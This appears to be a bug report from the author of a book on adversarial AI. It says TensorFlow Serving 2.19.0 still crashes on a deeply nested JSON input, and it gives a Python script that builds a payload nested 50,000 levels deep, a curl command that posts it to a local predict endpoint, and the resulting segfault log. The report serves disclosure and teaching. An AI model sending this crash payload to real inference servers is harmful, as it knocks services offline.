Description
I am working on my book on adversarial AI: https://www.securitynik.com/2025/06/coming-soon-free-little-book-on.html and as part of that book I am talking about attacking the inference endpoint. As expected, version 2.18.0 of TF Serving is vulnerable to the JSON issue. We know this. However, when I try to show the mitigation is upgrading to 2.19.0, unfortunately this version also crashes.
Here is my code to create the file:

```python
import os

# Increase recurse_depth to 50_000
recurse_depth = 50_000

# Create a file on the file system
with open(file="/tmp/tf_serv_vuln.json", mode="w") as f:
    # Write to the file
    # This information should look similar to what you saw earlier
    f.write('{"instances": ' + ('[' * recurse_depth) + '0.5' + (']' * recurse_depth) + '}')

# Verify the file has been created (plain-Python stand-in for the notebook's `!ls /tmp/tf_serv_vuln.json`)
print(os.path.exists("/tmp/tf_serv_vuln.json"))
```
Here is my curl command:

```
curl --request POST "http://localhost:8501/v1/models/vuln_tf_serv:predict" --header "Content-Type: application/json" --header "User-agent: securitynik_adversarial_ai_lab" --data-binary @/tmp/tf_serv_vuln.json
```

Here is the result of my curl command:

```
curl: (52) Empty reply from server
```
Here is the output from the TF Serving console:

```
[evhttp_server.cc : 261] NET_LOG: Entering the event loop ...
/usr/bin/tf_serving_entrypoint.sh: line 3: 7 Segmentation fault (core dumped) tensorflow_model_server --port=8500 --rest_api_port=8501 --model_name=${MODEL_NAME} --model_base_path=${MODEL_BASE_PATH}/${MODEL_NAME} "$@"
```
Here is my docker information:

```
sudo docker images
REPOSITORY           TAG      IMAGE ID       CREATED        SIZE
tensorflow/serving   2.19.0   d871e064642e   2 months ago   729MB
```
Here is also how I served the image:

```
sudo docker run --rm -p 8501:8501 --name=tfserving -v "/tmp/models/my_model:/models/vuln_tf_serv" -e MODEL_NAME=vuln_tf_serv tensorflow/serving:2.19.0
```
Let me know if I did something wrong on my end. Would love to know what I might have missed.